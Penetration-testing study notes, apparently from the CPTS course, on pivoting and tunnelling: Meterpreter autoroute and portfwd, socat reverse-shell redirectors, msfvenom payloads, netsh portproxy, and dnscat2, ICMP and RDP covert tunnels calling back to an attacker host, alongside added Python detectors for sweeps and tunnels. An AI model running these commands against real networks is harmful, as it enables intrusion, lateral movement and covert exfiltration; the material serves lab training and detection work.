Tunneling & Pivoting Techniques
The rest of the CPTS pivoting module beyond SSH and Ligolo: host discovery on the second network, Meterpreter autoroute/SOCKS/portfwd, socat reverse and bind redirection, plink.exe and netsh on Windows, plus the covert tunnels: dnscat2 (DNS), ptunnel-ng (ICMP) and SocksOverRDP. Ligolo-ng is the modern alternative to Chisel; reach for these when SSH or a tun interface isn't an option.
Picking a tool: Ligolo-ng is the cleanest modern pivot (a tun interface, no proxychains) and is the preferred alternative to Chisel; SSH forwarding covers -L/-R/-D + sshuttle + chisel. This note collects everything else in the module for when those don’t fit: Meterpreter-native pivots, OS-native tools (socat, plink, netsh), and covert tunnels (DNS, ICMP, RDP).
Discover the second network
Once you land on a dual-homed pivot, find the hidden subnet before tunnelling.
Meterpreter ping sweep:
run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23
Bash one-liner on a Linux pivot:
for i in {1..254}; do (ping -c 1 172.16.5.$i | grep "bytes from" &); done
CMD one-liner on a Windows pivot:
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"
PowerShell sweep:
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"}
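The four sweeps above all look the same on the wire: one source sending ICMP echo requests to host after host in a single /24. As an added example (not part of the CPTS module), this Python detector flags that fan-out in flow records; the records and the 20-host threshold are constructed assumptions.

```python
# Added example (not part of the CPTS module): detect the sweep pattern above
# from ICMP flow records. The records below are constructed for this example.
from collections import defaultdict
from ipaddress import ip_network

ECHO_REQUEST = 8  # ICMP type sent by every variant of the sweep

def constructed_flows():
    """One pivot (172.16.5.129) probing 172.16.5.1-60 within four seconds,
    plus a normal host pinging its gateway a few times."""
    rows = [(1700000000 + i // 20, "172.16.5.129", f"172.16.5.{i}", ECHO_REQUEST)
            for i in range(1, 61)]
    rows += [(1700000005 + k, "172.16.5.19", "172.16.5.1", ECHO_REQUEST) for k in range(3)]
    return rows

def detect_ping_sweep(flows, window=60, min_targets=20):
    """Return {src: most distinct /24-local targets hit inside any `window`
    seconds} for sources that reach at least `min_targets` distinct hosts.
    flows: iterable of (epoch_seconds, src_ip, dst_ip, icmp_type)."""
    by_src = defaultdict(list)
    for ts, src, dst, icmp_type in flows:
        if icmp_type == ECHO_REQUEST:
            by_src[src].append((ts, dst))
    hits = {}
    for src, events in by_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            # Targets are grouped per /24: a sweep walks one subnet host by host.
            per_net = defaultdict(set)
            for ts, dst in events[i:]:
                if ts - t0 > window:
                    break
                per_net[ip_network(f"{dst}/24", strict=False)].add(dst)
            best = max(len(s) for s in per_net.values())
            if best >= min_targets:
                hits[src] = max(hits.get(src, 0), best)
    return hits

if __name__ == "__main__":
    for src, n in detect_ping_sweep(constructed_flows()).items():
        print(f"{src}: echo requests to {n} distinct hosts in one /24 within 60s")
```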
Meterpreter pivoting
If you already have a Meterpreter session on the pivot, route through it instead of SSH.
SOCKS proxy + autoroute (whole subnet)
Add a route to the hidden subnet through the session:
run autoroute -s 172.16.5.0/23
Start a SOCKS proxy that rides the route:
use auxiliary/server/socks_proxy
set SRVPORT 9050
set VERSION 4a
run
Point proxychains at it:
echo 'socks4 127.0.0.1 9050' | sudo tee -a /etc/proxychains.conf
Then scan/connect through the pivot:
proxychains nmap -sT -Pn -p3389 172.16.5.19
portfwd (single port)
Local relay — pull an internal port to your localhost:
portfwd add -l 3300 -p 3389 -r 172.16.5.19
Use it:
xfreerdp /v:localhost:3300 /u:victor /p:pass@123
Reverse relay — listen on the pivot, forward back to your handler:
portfwd add -R -l 8081 -p 1234 -L 10.10.14.18
socat redirection
A standalone bidirectional relay — no SSH needed. Run it on the pivot.
Reverse-shell redirector
On the pivot, listen and forward back to your attack host:
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
Build a payload that calls back to the pivot (172.16.5.129:8080):
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 LPORT=8080 -f exe -o backupscript.exe
Bind-shell redirector
On the pivot, forward inbound connections to a bind shell on an internal host:
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
Bind payload to drop on the internal Windows host:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8443 -f exe -o backupjob.exe
Windows-native forwarding
plink.exe (dynamic SOCKS from a Windows attack host)
Open a SOCKS proxy over SSH from Windows (then point Proxifier at 127.0.0.1:9050):
plink -ssh -D 9050 ubuntu@10.129.15.50
netsh portproxy
Forward a listening port on the compromised Windows host to an internal target:
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
Verify the rule:
netsh.exe interface portproxy show v4tov4
Then connect to the pivot’s 8080 from your box:
xfreerdp /v:10.129.15.150:8080 /u:victor /p:pass@123
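The verify command above is also what a defender runs: a portproxy rule that listens on one interface and connects into a different subnet (or to an admin port) is exactly the pivot shape. As an added example (not part of the CPTS module), this Python parser audits that netsh output; the sample output and the flagged-port list are constructed assumptions.

```python
# Added example (not part of the CPTS module): audit the output of
# `netsh interface portproxy show v4tov4` and flag relays like the one above.
# The sample output is constructed in the layout netsh prints.
import re
from ipaddress import ip_network

NETSH_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.129.15.150   8080        172.16.5.25     3389
127.0.0.1       8443        127.0.0.1       443
"""

# Rule rows are four whitespace-separated fields; header and separator rows
# do not match because their port columns are not numeric.
RULE_RE = re.compile(r"^\s*(\d+\.\d+\.\d+\.\d+)\s+(\d+)\s+(\d+\.\d+\.\d+\.\d+)\s+(\d+)\s*$")

ADMIN_PORTS = {3389: "RDP", 445: "SMB", 5985: "WinRM", 5986: "WinRM-HTTPS", 22: "SSH"}

def parse_portproxy(text):
    """Return [(listen_addr, listen_port, connect_addr, connect_port), ...]."""
    return [(m[1], int(m[2]), m[3], int(m[4]))
            for m in (RULE_RE.match(line) for line in text.splitlines()) if m]

def audit_portproxy(rules):
    """Return [(rule, [reasons])] for rules worth investigating: a relay into a
    different /24 than the listener (the classic pivot), or one that reaches an
    admin service. Loopback-to-loopback rules on ordinary ports are left alone."""
    findings = []
    for rule in rules:
        la, lp, ca, cp = rule
        reasons = []
        if ip_network(f"{la}/24", strict=False) != ip_network(f"{ca}/24", strict=False):
            reasons.append(f"relays {la}:{lp} into another subnet ({ca})")
        if cp in ADMIN_PORTS:
            reasons.append(f"target port {cp} is {ADMIN_PORTS[cp]}")
        if reasons:
            findings.append((rule, reasons))
    return findings

if __name__ == "__main__":
    for rule, reasons in audit_portproxy(parse_portproxy(NETSH_OUTPUT)):
        print(rule, "->", "; ".join(reasons))
```

The same rules persist under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp, so that key is the on-host artifact to baseline even when nobody re-runs netsh.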
Covert tunnels
When egress is filtered, tunnel over a protocol the firewall lets through.
dnscat2 (DNS tunneling)
Start the server on your attack host (authoritative for the domain):
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
On the Windows target, import the PowerShell client:
Import-Module .\dnscat2.ps1
Connect back with the server’s pre-shared secret and hand over a shell:
Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret <SECRET> -Exec cmd
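From the resolver's side, the session above is a stream of unique, long, hex-encoded subdomains under one domain. As an added example (not part of the CPTS module), this Python scorer picks that client out of DNS query logs; the log lines, the two-label domain suffix and the thresholds are constructed assumptions.

```python
# Added example (not part of the CPTS module): score DNS query logs for the
# dnscat2 traffic pattern above: a client sending many unique, long,
# hex-encoded subdomains under a single domain. Log lines are constructed.
import random
from collections import defaultdict

HEX = set("0123456789abcdef")

def constructed_log(n_tunnel=40):
    """Three ordinary lookups from 10.0.0.7 and n_tunnel dnscat2-style
    queries from 10.0.0.9 (hex payload split into <=60-char labels)."""
    rnd = random.Random(1)  # fixed seed keeps the sample reproducible
    lines = ["10.0.0.7 A www.example.com", "10.0.0.7 A cdn.example.net",
             "10.0.0.7 A mail.inlanefreight.local"]
    for _ in range(n_tunnel):
        payload = "".join(rnd.choice("0123456789abcdef") for _ in range(rnd.randint(40, 120)))
        labels = ".".join(payload[i:i + 60] for i in range(0, len(payload), 60))
        qtype = rnd.choice(["TXT", "CNAME", "MX"])
        lines.append(f"10.0.0.9 {qtype} {labels}.inlanefreight.local")
    return lines

def hex_ratio(s):
    """Fraction of characters that are hex digits (0.0 for an empty string)."""
    return sum(c in HEX for c in s.lower()) / len(s) if s else 0.0

def score_clients(lines, suffix_labels=2, min_len=30, min_hits=20):
    """Return {client: {"hits": n, "domains": {...}}} for clients with at least
    min_hits distinct queries whose subdomain part (labels above the last
    suffix_labels) is >= min_len characters and >= 90% hex digits.
    lines: "client_ip qtype qname" records."""
    seen = defaultdict(set)
    domains = defaultdict(set)
    for line in lines:
        client, qtype, qname = line.split()
        labels = qname.rstrip(".").split(".")
        sub = "".join(labels[:-suffix_labels])
        if len(sub) >= min_len and hex_ratio(sub) >= 0.9:
            seen[client].add(qname)
            domains[client].add(".".join(labels[-suffix_labels:]))
    return {c: {"hits": len(q), "domains": domains[c]}
            for c, q in seen.items() if len(q) >= min_hits}

if __name__ == "__main__":
    for client, info in score_clients(constructed_log()).items():
        print(f"{client}: {info['hits']} hex-encoded queries under {sorted(info['domains'])}")
```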
ptunnel-ng (ICMP tunneling)
On the pivot, start the server (accepts ping packets on its reachable IP):
sudo ./ptunnel-ng -r10.129.202.64 -R22
On your attack host, open the client and map local 2222 into the tunnel:
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22
SSH through the ICMP tunnel:
ssh -p2222 -lubuntu 127.0.0.1
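An SSH session carried over echo requests looks nothing like a real ping: one host pair exchanging a burst of echo packets with payloads far larger than the default 56 (Linux) or 32 (Windows) bytes. As an added example (not part of the CPTS module), this Python detector flags that pair from packet summaries; the summaries, the 64-byte cutoff and the 10-packet threshold are constructed assumptions.

```python
# Added example (not part of the CPTS module): flag the ICMP tunnel pattern
# above in packet summaries: one host pair exchanging many echo packets whose
# payloads are far larger than a normal ping's. Summaries are constructed.
from collections import defaultdict

ECHO_REPLY, ECHO_REQUEST = 0, 8
NORMAL_PAYLOAD = 64  # Linux ping sends 56 bytes, Windows 32; allow some slack

def constructed_packets():
    """A normal ping exchange and a tunnel carrying an SSH session over ICMP
    between 10.10.14.18 and 10.129.202.64 (sizes are constructed)."""
    pkts = []
    for k in range(4):  # ordinary ping: 56-byte request and reply
        pkts += [(k, "10.0.0.5", "10.0.0.1", ECHO_REQUEST, 56),
                 (k, "10.0.0.1", "10.0.0.5", ECHO_REPLY, 56)]
    for k in range(30):  # tunnel: large payloads, bursty, both directions
        pkts += [(k, "10.10.14.18", "10.129.202.64", ECHO_REQUEST, 1000),
                 (k, "10.129.202.64", "10.10.14.18", ECHO_REPLY, 800)]
    return pkts

def detect_icmp_tunnel(pkts, max_payload=NORMAL_PAYLOAD, min_large=10):
    """Return {(a, b): {"large": n, "bytes": total}} for unordered host pairs
    with at least min_large echo packets whose payload exceeds max_payload.
    pkts: iterable of (epoch_seconds, src, dst, icmp_type, payload_len)."""
    stats = defaultdict(lambda: {"large": 0, "bytes": 0})
    for _, src, dst, icmp_type, plen in pkts:
        if icmp_type not in (ECHO_REQUEST, ECHO_REPLY) or plen <= max_payload:
            continue
        pair = tuple(sorted((src, dst)))  # count both directions together
        stats[pair]["large"] += 1
        stats[pair]["bytes"] += plen
    return {p: s for p, s in stats.items() if s["large"] >= min_large}

if __name__ == "__main__":
    for (a, b), s in detect_icmp_tunnel(constructed_packets()).items():
        print(f"{a} <-> {b}: {s['large']} oversized echo packets, {s['bytes']} payload bytes")
```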
SocksOverRDP (tunnel SOCKS over an RDP channel)
On the first Windows host, register the plugin DLL:
regsvr32.exe SocksOverRDP-Plugin.dll
After RDP’ing onward with the plugin active, confirm the SOCKS listener (then point Proxifier at 127.0.0.1:1080):
netstat -antb | findstr 1080
rpivot (reverse SOCKS through an HTTP/NTLM proxy)
Use this when the pivot can't accept inbound connections and must dial out, even through a corporate NTLM proxy.
Server on your attack host:
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
Client on the pivot, dialing back to you:
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
Through an authenticated NTLM proxy:
python2.7 client.py --server-ip <YOUR_IP> --server-port 9999 --ntlm-proxy-ip <PROXY> --ntlm-username <user> --ntlm-password <pass>
Tool selection: prefer Ligolo-ng (or SSH -D) for a clean SOCKS pivot; drop to Meterpreter autoroute/portfwd when you're already in MSF; use socat/netsh/plink when you only have native binaries; and reach for dnscat2 / ptunnel-ng / SocksOverRDP only when TCP egress is filtered and you must tunnel over DNS, ICMP or RDP.